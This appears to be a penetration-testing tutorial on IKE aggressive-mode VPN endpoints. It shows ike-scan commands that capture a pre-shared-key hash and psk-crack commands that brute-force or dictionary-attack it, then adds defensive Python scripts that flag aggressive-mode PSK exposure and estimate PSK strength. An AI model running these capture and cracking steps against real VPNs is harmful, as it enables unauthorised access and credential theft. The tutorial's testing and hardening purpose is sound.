IPSEC Internet Key Exchange (IKE)


The remote host seems to be enabled to do Internet Key Exchange (IKE). This is typically indicative of a VPN server. VPN servers are used to connect remote hosts into internal resources.

Make sure that the use of this VPN endpoint is done in accordance with your corporate security policy.

Note that if the remote host is not configured to allow the Nessus host to perform IKE/IPSEC negotiations, Nessus won’t be able to detect the IKE service.

Also note that this plugin does not run over IPv6.


If this service is not needed, disable it or filter incoming traffic to this port.

OK, so how exactly can we test this, or even compromise it?

First, scan the host to check whether the VPN endpoint has aggressive mode enabled.

ike-scan is installed by default on BackTrack and Kali Linux.

$ ike-scan -A

Starting ike-scan 1.9 with 1 hosts

Aggressive Mode Handshake returned HDR=(CKY-R=f320d6*******)
SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=12f5f28c*********** (Cisco Unity)
VID=afcad71368a1***********(Dead Peer Detection v1.0)
VID=090026************ (XAUTH)
KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value= Nonce(20 bytes) Hash(16 bytes)
The above is the aggressive-mode handshake returned by the endpoint.
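A defender reading that handshake wants the same facts pulled out mechanically: is aggressive mode answered at all, is the authentication method PSK, and which transforms does the responder accept. The script below is an added example, not code from the original post or from ike-scan; it parses the text ike-scan -A prints (the page's own output, with its redacted asterisked values, is embedded as a constructed sample, as is a second, assumed main-mode sample with an assumed output shape) and turns it into severity-tagged findings. The weak-transform table and the severities are my own assumptions about what a modern IKEv1 policy should flag.

```python
"""Triage ike-scan aggressive-mode output for PSK exposure.

Added example, not part of the original post or of ike-scan itself:
it reads the text ike-scan -A prints and turns it into findings a
defender can act on (aggressive mode + PSK, weak transforms, XAUTH).
"""
import re

# Constructed sample: the handshake shown on the page, with the page's
# redacted (asterisked) cookie and vendor IDs kept as they appear there.
AGGRESSIVE_SAMPLE = """\
Starting ike-scan 1.9 with 1 hosts
Aggressive Mode Handshake returned HDR=(CKY-R=f320d6*******)
SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=12f5f28c*********** (Cisco Unity)
VID=afcad71368a1***********(Dead Peer Detection v1.0)
VID=090026************ (XAUTH)
KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.0.2.1) Nonce(20 bytes) Hash(16 bytes)
"""

# Constructed sample (assumed output shape) of a responder that only offers
# main mode with certificate authentication and modern transforms.
MAIN_MODE_SAMPLE = """\
Starting ike-scan 1.9 with 1 hosts
Main Mode Handshake returned HDR=(CKY-R=0123456789abcdef)
SA=(Enc=AES KeyLength=256 Hash=SHA256 Group=14:modp2048 Auth=RSA_Sig LifeType=Seconds LifeDuration=28800)
"""

SA_RE = re.compile(r"SA=\(([^)]*)\)")
VID_RE = re.compile(r"VID=(\S+?)\s*\(([^)]+)\)")

# Assumed policy: transform values that should raise a flag in a modern IKEv1 setup.
WEAK_TRANSFORMS = {
    "Enc": {"DES": "single DES", "3DES": "3DES (64-bit block cipher, deprecated)"},
    "Hash": {"MD5": "MD5 (deprecated)", "SHA1": "SHA-1 (deprecated)"},
    "Group": {"1:modp768": "MODP-768", "2:modp1024": "MODP-1024 (below 2048 bits)"},
}


def parse_ike_scan(output: str) -> dict:
    """Parse one ike-scan run into mode, SA attributes, vendor IDs and findings."""
    parsed = {"aggressive_mode": False, "sa": {}, "vids": [], "findings": []}
    for line in output.splitlines():
        line = line.strip()
        if "Aggressive Mode Handshake returned" in line:
            parsed["aggressive_mode"] = True
        sa = SA_RE.search(line)
        if sa:
            # Each "Key=Value" token inside SA=(...) becomes one SA attribute.
            for token in sa.group(1).split():
                key, _, value = token.partition("=")
                parsed["sa"][key] = value
        for _vid_hex, label in VID_RE.findall(line):
            parsed["vids"].append(label)
    parsed["findings"] = assess(parsed)
    return parsed


def assess(parsed: dict) -> list:
    """Return (severity, message) pairs; an empty list means nothing to flag."""
    findings = []
    sa = parsed["sa"]
    if parsed["aggressive_mode"]:
        if sa.get("Auth") == "PSK":
            findings.append(("HIGH", "Aggressive mode with PSK: the responder's hash is sent "
                                     "in the clear, so the PSK can be attacked offline"))
        else:
            findings.append(("MEDIUM", "Aggressive mode enabled: identities are exchanged unencrypted"))
    for field, weak in WEAK_TRANSFORMS.items():
        value = sa.get(field)
        if value in weak:
            findings.append(("LOW", f"Weak {field} transform accepted: {weak[value]}"))
    if "XAUTH" in parsed["vids"]:
        findings.append(("INFO", "XAUTH advertised: remote-access VPN, user credentials also in scope"))
    return findings


if __name__ == "__main__":
    for name, sample in (("aggressive", AGGRESSIVE_SAMPLE), ("main-mode", MAIN_MODE_SAMPLE)):
        report = parse_ike_scan(sample)
        print(f"[{name}] aggressive={report['aggressive_mode']} sa={report['sa']}")
        for severity, message in report["findings"] or [("OK", "no findings")]:
            print(f"  {severity}: {message}")
```

Run against a saved ike-scan log, the HIGH finding is the one that matters: it fires only when aggressive mode is answered with Auth=PSK, which is exactly the condition the rest of this post exploits, and it disappears once the endpoint is moved to main mode or certificate authentication.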
Now run it again, this time saving the PSK parameters (the hash and the values needed to attack it) to a file with -P:

$ ike-scan -A --id=myid -P192-168-207-134key

Now we have the captured PSK hash and parameters. Let's try to crack it with psk-crack:

Brute force:
$ psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations
no match found for MD5 hash 5c178d*****
Ending psk-crack: 60466176 iterations in 138.019 seconds

The default charset is "0123456789abcdefghijklmnopqrstuvwxyz"; it can be changed with --charset=

$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJK" 192-168-207-134key
Running in brute-force cracking mode
Brute force with 63 chars up to length 5 will take up to 992436543 iterations

Dictionary attack:
$ psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode
no match found for MD5 hash 5c178d*****
Ending psk-crack: 14344876 iterations in 33.400 seconds

As you can see, this key is long and complex enough that neither attack recovers the plaintext PSK. A win for the sysadmins here.

If the PSK does get cracked with this method, psk-crack prints it in plain text in the results.
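The numbers psk-crack printed above are enough to answer the question a sysadmin actually cares about: how long would our PSK survive this? The script below is an added example, not code from the original post or from psk-crack. It reproduces psk-crack's own accounting (a charset of n symbols up to length L is reported as n^L iterations, which gives the page's 60466176 and 992436543 figures), takes the iteration rate from the page's completed run (60466176 iterations in 138.019 seconds), and wraps that in a policy check; the million-fold attacker speedup and the 100-year threshold are assumptions I chose as a margin for faster hardware.

```python
"""Estimate how long an IKE PSK would survive the cracking approach above.

Added example, not part of the original post or of psk-crack: it turns
psk-crack's own accounting (charset ** length iterations, the measured
iteration rate) into a go/no-go check for a PSK policy.
"""

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def iterations(charset_size: int, max_length: int) -> int:
    """Upper bound psk-crack reports for -b: charset_size ** max_length."""
    return charset_size ** max_length


def observed_rate(iterations_done: int, seconds: float) -> float:
    """Hashes per second, taken from a completed run's closing line."""
    return iterations_done / seconds


def years_to_exhaust(charset_size: int, length: int, rate: float) -> float:
    """Wall-clock years to try every key of exactly this length at this rate."""
    return iterations(charset_size, length) / rate / SECONDS_PER_YEAR


def psk_resists(charset_size: int, length: int, rate: float,
                speedup: float = 1e6, min_years: float = 100.0) -> bool:
    """Policy check (assumed thresholds): grant the attacker `speedup` times the
    single-core rate measured on the page, and require the whole keyspace to
    take at least `min_years` to exhaust."""
    return years_to_exhaust(charset_size, length, rate * speedup) >= min_years


if __name__ == "__main__":
    # Figures from the page: 36-char charset, length 5, 60466176 iterations in 138.019 s.
    rate = observed_rate(60466176, 138.019)
    print(f"measured rate: {rate:,.0f} hashes/s")
    # Candidate PSK policies: lowercase alphanumerics vs full printable ASCII (94 symbols).
    for charset, length in ((36, 5), (36, 8), (94, 12), (94, 20)):
        print(f"{charset}^{length}: {years_to_exhaust(charset, length, rate):.3g} years "
              f"at measured rate; resists policy: {psk_resists(charset, length, rate)}")
```

The point the output makes is the one the post's result hints at: an 8-character lowercase alphanumeric PSK falls in seconds once the attacker has better hardware than one psk-crack process, while a random 12-or-more character printable-ASCII PSK does not, and the real fix is to stop offering aggressive mode with PSK in the first place so there is nothing to crack offline.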

